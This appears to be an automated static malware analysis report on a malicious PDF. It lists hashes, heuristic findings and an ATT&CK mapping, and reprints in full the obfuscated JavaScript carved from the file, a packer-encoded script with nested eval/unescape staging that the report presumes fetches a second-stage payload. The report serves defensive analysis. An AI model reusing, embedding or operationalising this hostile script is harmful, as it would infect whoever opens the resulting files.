Malicious PDF — malware analysis report

Static analysis result for SHA-256 1cfaa62e9c9a3ccb…

MALICIOUS

PDF

8.8 KB Created: 2009-09-04 01:37:43 Authoring application: DXskAEAloDtkjJik (via RgKyjttATOEOmVUSzQ) First seen: 2026-05-08
MD5: 75338807fcd89b39c0041a167371fad3 SHA-1: 010da1ca15b8dea9ce1c9f346b2786b5be3d444f SHA-256: 1cfaa62e9c9a3ccb795bf425f750a004e6f3ac4b2f1aa356a4ae850bb79dad0f
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded and obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_FROMCHARCODE. The extracted artifact 'javascript_obj0007_000.js' likely contains malicious code. The obfuscation suggests an attempt to hide the script's true purpose, which is presumed to be downloading and executing a second-stage payload. The document body text is nonsensical and appears to be filler.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action (low) — 2 related findings — PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical) — PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    e  =  function\(  c    \){
    return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1w 3y\(12\){Z T=0;Z X="";3u\(T=0;T<12.3q;T++\){X=X+3r.3s\(12.3t\(T\)^3\)}1s X}1w 1D\(1o\){1s 3z\(1o\)}Z 3A="&3G&3H&1E&v:`c&3I;&e&3F&3E;0"+"&3B&3C`3&3D&Q;3p&v;1q`&3o`s …
    )
  • Embedded JS stream (low) — PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (info) — EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x406 | 7232 bytes
SHA-256: f002a7803934a0cd4228a3945bf88ff66a9ba0fba9e9c3735c1fbe2e861920cf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Extracted artifact (javascript_obj0007_000.js), reproduced byte-for-byte below.
//
// Eval trampoline: the function body does nothing except pass its single argument
// to eval(), so whatever string the call site builds is executed as code. The odd
// whitespace and line breaks around "eval (" are part of the sample, not rendering
// damage, and do not change what runs.
//
// Call site (the statement that follows this function): Boq9qtf6 is invoked once
// with the return value of a p,a,c,k,e,d unpacker in the Dean Edwards /packer/ idiom
// — radix 62 (the `62` argument) and a 285-entry '|'-separated dictionary — so the
// first layer is pure token substitution, not encryption. Resolving dictionary
// entries by index from the listing (Z -> var, 1w -> function, 1s -> return,
// 3v -> replace, 3w -> eval, 3x -> u00, 3z -> unescape), the unpacked text ends by
// rewriting every '@' in a long string to a "%u00"-style escape and then
// eval(unescape(...))-ing the result: a second eval layer behind the first, which is
// what the PDF_JS_EXPLOIT_CLUSTER finding above (eval/unescape/fromCharCode staging)
// is reporting. The index resolution here was done by hand from the listing and
// should be confirmed in an isolated analysis environment before being relied on.
function Boq9qtf6(Wzdk9fvx){

 eval (
 Wzdk9fvx
 );
}

Boq9qtf6(

	function
( p,	a, c,
k,

e,

d

)

{
e  =  function(  c    ){
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1w 3y(12){Z T=0;Z X="";3u(T=0;T<12.3q;T++){X=X+3r.3s(12.3t(T)^3)}1s X}1w 1D(1o){1s 3z(1o)}Z 3A="&3G&3H&1E&v:`c&3I;&e&3F&3E;0"+"&3B&3C`3&3D&Q;3p&v;1q`&3o`s&1i;a&2W`"+"&1y;a&2X;&v;1q:&2Y&1y;g&v;2V`&2U`s&1E"+"&2Q&D&2R&2S&2T&e&2Z&3e;"+"&D&3n&v;:t&v;J&U`1&D&M&v;35;"+"&e&1k&1d:6&D&v;:33&v;J&U`1&D"+"&13&1h&v;b`1&1c:`&3f&e&1b;3&1C"+"&v;;35&1B`&1z&v`1F&1G&v;:33&v;J&1I`1"+"&G&M&v:10&1H&e&O;:&v`1;2&1m"+"&e&1n&v:10&1x&e&N&N&O;:"+"&v`1;2&11&e&v;:7&v;J&Q;`1&G&M"+"&N&1r&1A&O;:&v`1;2&11&e&1v"+"&1u:6&D&v;:33&v;J&U`1&D&M&v;35;"+"&e&1k&1d:6&D&v;:33&v;J&U`1&D"+"&13&1h&v;b`1&1c:`&2E&e&1b;3&1C"+"&v;;35&1B`&1z&v`1F&1G&v;:33&v;J&1I`1"+"&G&M&v:10&1H&e&O;:&v`1;2&1m"+"&e&1n&v:10&1x&e&N&N&O;:"+"&v`1;2&11&e&v;:7&v;J&1K`1&G&M"+"&N&1r&1A&O;:&v`1;2&11&e&1v"+"&1u:6&D&v:2m&2i&2r&2q:&v`2s;&e"+"&e&e&e&e&e&e&e&19"+"&2t&2v&2u&2o&2n;&W`33&1g&W`16"+"&2h:&2g&Q:41&2j&19&2k&2l&2w"+"&2x&1j&2J&2I&2H:&Q;8&2K&2L"+"&2N;:&2M;:&v`2G&2F&2A:2z&v;:2y&2B:&2C`3"+"&27`&e&18&R&e&1f&v;Y&R"+"&e&1i;a&v;2D;&2O``5&18&R&e&1J;g"+"&1L&e&1a&14;6&G&1M&1a&14;6"+"&G&1O&1N&v;Y&R&e&24&1Y"+"&1X&v;Y&R&e&v`5;:&1Z;:&21`r&1P"+"&23:&1W&1V&1R:&1Q:0&1S&1T;6&G"+"&13&v:1U&1f&2p`2&3Z&3Y;6&G&v;:33"+"&3X`5&v;Y&R&e&3W`0&40&e&e"+"&e&e&e&e&e&v;:33&14;6&G"+"&46&4c;H&4b;&47&3V&3U&v;3`f&3O"+"&3N&3M&3L`0&W`7&3P&3Q&W`E&3T`"+"&3S&3R`&4g&P`4h&1g&2P&4v&P`5:"+"&4u&4t&4w&4x&4A&Q;L&4z&4y"+"&4s&4r;&P;43&4l&4k;&4j&4i&Q:1e"+"&15;&15;&15;&17;&1j&4m&4n&4q"+"&P`L&4p&4o&3K&3J;&P:3i&3h&3g"+"&17;&P`5`&3j&3k&v:3m"+"";Z 
V="@8@7@4@20@4a@37@9@t@36@34@j@8@20@3d@20@7@z@z@2e@8@j@h@E@h@4@L@h@4@s@j@t@o@2e@d@t@K@d@4@j@o@9@28@29@3b@4a@37@9@t@36@34@j@8@20@3d@20@4a@37@9@t@36@34@j@8@2e@4@h@z@m@7@p@h@28@2f@3l@44@2f@9@2c@22@22@29@3b@i@j@c@28@4a@37@9@t@36@34@j@8"+"@2e@p@x@7@4@41@d@28@30@29@20@3d@3d@20@22@38@22@20@26@26@20@4a@37@9@t@36@34@j@8@2e@p@x@7@4@41@d@28@31@29@20@3c@3d@20@22@31@22@20@26@26@20@4a@37@9@t@36@34@j@8@2e@p@x@7@4@41@d@28@32@29@20@3c@3d@20@22@32@22@29@I@i@n@4e@34@34@33@u@k@q@20@3d@20@B@m@j@y@8"+"@d@w@28@42@r@8@m@d@9@9@d@28@1l@35@7@s@m@30@29@29@3b@i@n@8@7@4@20@B@8@39@C@l@38@20@3d@20@B@m@j@y@8@d@w@28@22@25@k@30@7@30@22@20@2b@20@22@7@25@k@30@7@22@20@2b@20@22@30@7@22@20@2b@20@22@22@29@3b@i@n@8@7@4@20@44@37@c@w@j@l@k@20@3d@20@32@30@20"+"@2b@20@4e@34@34@33@u@k@q@2e@m@h@o@9@d@x@3b@i@n@E@x@j@m@h@28@B@8@39@C@l@38@2e@m@h@o@9@d@x@20@3c@20@44@37@c@w@j@l@k@29@20@B@8@39@C@l@38@20@2b@3d@20@B@8@39@C@l@38@3b@i@n@8@7@4@20@48@33@w@39@p@33@4@20@3d@20@B@8@39@C@l@38@2e@s@k@r@s"+"@d@4@j@o@9@28@30@2c@20@44@37@c@w@j@l@k@29@3b@i@n@8@7@4@20@K@36@o@4@39@31@u@r@20@3d@20@B@8@39@C@l@38@2e@s@k@r@s@d@4@j@o@9@28@30@2c@20@B@8@39@C@l@38@2e@m@h@o@9@d@x@20@2d@20@44@37@c@w@j@l@k@29@3b@i@n@E@x@j@m@h@28@K@36@o@4@39@31"+"@u@r@2e@m@h@o@9@d@x@20@2b@20@44@37@c@w@j@l@k@20@3c@20@30@A@36@30@30@30@30@29@20@K@36@o@4@39@31@u@r@20@3d@20@K@36@o@4@39@31@u@r@20@2b@20@K@36@o@4@39@31@u@r@20@2b@20@48@33@w@39@p@33@4@3b@i@n@8@7@4@20@44@q@l@s@d@9@r@h@20@3d@20@o@h@E@20@41"+"@4@4@7@w@28@29@3b@i@n@c@t@4@28@43@38@30@r@h@s@c@31@9@20@3d@20@30@3b@20@43@38@30@r@h@s@c@31@9@20@3c@20@31@32@30@30@3b@20@43@38@30@r@h@s@c@31@9@2b@2b@29@I@44@q@l@s@d@9@r@h@1p@43@38@30@r@h@s@c@31@9@1t@20@3d@20@K@36@o@4@39@31@u@r@20@2b@20@4e@34"+"@34@33@u@k@q@F@i@n@8@7@4@20@49@7@33@l@38@p@33@20@3d@20@22@31@32@22@3b@i@n@c@t@4@20@28@8@7@4@20@4f@34@k@u@y@38@9@A@3d@30@3b@20@4f@34@k@u@y@38@9@A@3c@31@38@3b@20@4f@34@k@u@y@38@9@A@2b@2b@29@I@20@49@7@33@l@38@p@33@20@3d@20@49@7@33@l@38@p@33@2b"+"@22@39@22@3b@F@i@n@c@t@4@20@28@8@7@4@20@4f@34@k@u@y@38@9@A@3d@30@3b@20@4f@34@k@u@y@38@9@A@3c@
32@37@36@3b@20@4f@34@k@u@y@38@9@A@2b@2b@29@I@20@49@7@33@l@38@p@33@20@3d@20@49@7@33@l@38@p@33@2b@22@38@22@3b@F@i@20@20@20@20@k@d@j@m@2e@z@4@j@o@d@c"+"@28@22@25@34@35@30@30@30@c@22@2c@20@49@7@33@l@38@p@33@29@3b@i@F@i@h@m@s@h@I@i@20@20@20@20@i@n@8@7@4@20@4e@u@4@w@30@h@35@38@m@20@3d@20@o@h@E@20@41@4@4@7@w@28@29@3b@i@n@c@k@o@p@d@j@t@o@20@B@r@u@x@8@z@28@4a@39@z@l@9@q@c@2c@20@S@c@y"+"@w@c@H@k@d@s@29@I@i@n@E@x@j@m@h@28@4a@39@z@l@9@q@c@2e@m@h@o@9@d@x@20@2a@20@32@20@3c@20@S@c@y@w@c@H@k@d@s@29@I@i@n@4a@39@z@l@9@q@c@20@2b@3d@20@4a@39@z@l@9@q@c@3b@F@i@n@4a@39@z@l@9@q@c@20@3d@20@4a@39@z@l@9@q@c@2e@s@k@r@s"+"@d@4@j@o@9@28@30@2c@20@S@c@y@w@c@H@k@d@s@20@2f@20@32@29@3b@i@n@4@h@d@k@4@o@20@4a@39@z@l@9@q@c@3b@F@i@n@8@7@4@20@16@4@7@w@k@q@y@20@3d@20@30@A@30@p@30@p@30@p@30@p@3b@i@n@8@7@4@20@4e@30@h@33@j@x@H@20@3d@20@B@m@j@y@8@d@w@28@42"+"@r@8@m@d@9@9@d@28@1l@35@7@s@m@30@29@29@3b@i@n@8@7@4@20@4f@p@r@x@7@q@y@20@3d@20@30@A@34@30@30@30@30@30@3b@i@n@8@7@4@20@49@39@o@l@c@E@d@20@3d@20@4e@30@h@33@j@x@H@2e@m@h@o@9@d@x@20@2a@20@32@3b@i@n@8@7@4@20@S@c@y@w@c@H@k@d@s@20@3d"+"@20@4f@p@r@x@7@q@y@20@2d@20@28@49@39@o@l@c@E@d@2b@30@A@33@38@29@3b@i@n@8@7@4@20@4a@39@z@l@9@q@c@20@3d@20@B@m@j@y@8@d@w@28@22@25@k@39@30@39@30@25@k@39@30@39@30@22@29@3b@i@n@4a@39@z@l@9@q@c@20@3d@20@B@r@u@x@8@z@28@4a@39@z@l@9@q@c@2c@20"+"@S@c@y@w@c@H@k@d@s@29@3b@i@n@8@7@4@20@4d@q@32@o@38@p@39@20@3d@20@28@16@4@7@w@k@q@y@20@2d@20@30@A@34@30@30@30@30@30@29@20@2f@20@4f@p@r@x@7@q@y@3b@i@n@c@t@4@20@28@8@7@4@20@L@8@C@h@A@37@20@3d@20@30@3b@20@L@8@C@h@A@37@20@3c@20@4d@q@32@o"+"@38@p@39@3b@L@8@C@h@A@37@2b@2b@29@I@4e@u@4@w@30@h@35@38@m@1p@L@8@C@h@A@37@1t@20@3d@20@4a@39@z@l@9@q@c@20@2b@20@4e@30@h@33@j@x@H@3b@F@i@n@8@7@4@20@42@36@q@u@t@37@20@3d@20@B@m@j@y@8@d@w@28@22@25@k@30@p@30@p@22@20@2b@20@22@25@k@30@p@30@p"+"@22@20@2b@20@22@22@29@3b@i@n@E@x@j@m@h@28@42@36@q@u@t@37@2e@m@h@o@9@d@x@20@3c@20@34@34@39@35@32@29@20@42@36@q@u@t@37@20@2b@3d@20@42@36@q@u@t@37@3b@i@n@d@x@j@s@2e@p@t@m@m@7@r@K@d@t@4@h@20@3d@20@43@t@m@m@7@r@2e@p@t@m@m@h@p@d@45@y@7"+"@j@m@
49@o@c@t@28@I@s@k@r@q@3a@20@22@22@2c@y@s@9@3a@20@42@36@q@u@t@37@F@29@3b@i@F"+"";V=V.3v(/@/g,"%3x");3w(1D(V));',62,285,'||||72|||61|76|67|||66|74|v3333|||65|0a|69|75|6b|6c|09|6e|63|6a|62|73|6f|71||79|68|6d|70|78|54|7a|v3332|77|7d|v3331|64|7b|2fb|53|56|v6133|v335b|vfb|v5|v4|v312a|50|A358dt3ot|v6f|Geo6u8|v7|Vy50jg|630|var|6ee|v326f|Jrlbn4|v0233|v2a|v415|57|v565|va630|v5674|v30bg|vea|v06|v7f||vbg55|v525e|v32e5|v43|v5641|vee33|59|v3163|v6361|Xp2juzs1|5b|a3|vg3ee|return|5d|v6b|vee61|function|v3265|v73|vfa75|v365b|v012|v4733|Tlimvty|v6465|5ff|v0137|v3261|v76|vag|vb5|v312e|vba33|vbgba|v6333|vb5e0|vg2|v6ff|v30f3|v14|5e5|vfa70|v6f37|v65bg|vga02|vg4||ve||v476|v6fba|||v330|||||||||v5241|v515|v6e6g|v3372|v6347|v5e41|g33|v725|v4752|vf3|v6a6|v6b6f|06|v6747|v6343|v5g56|v7250|v5757|e4|eg|v1|v02e|vaf|04|v315f|v46bf|303|v5f5|v6433|v4040|v5056|vaa33|ve4|ve1|v2|v6757|v6faf|v3233|vaeff|v327f|v0|a4|vbg2|vfa3|v0773|vfe32|||||||||||||||vg5f|v3150|v1506|v0g57|0e|v025e|v3304|5c|333|v6e33|v3|03|length|String|fromCharCode|charCodeAt|for|replace|eval|u00|Bbvltggt|unescape|Y5asl0|v023g|v57|v7330|vfg|v6g33|v6063|v6162|v33f|v435|v431f|v66|vfgfa|v3147|vaa0f|v7e7g|v1f7f|v777|v6166|v337|v32ba|v6f6e|vfa|vbg|v2e|v3031|v3323||||||v6533|veeee||||vee6|vf||||v445e|5f|v1e0b|v4347|v475|v3343|v1f5e|v5f50|v565g|v5e50|v441e|v1f5|v4052|v4333|v7256|v755e|v5557|v4346|v4150|v3356|v1f57'.split('|'),0,{}))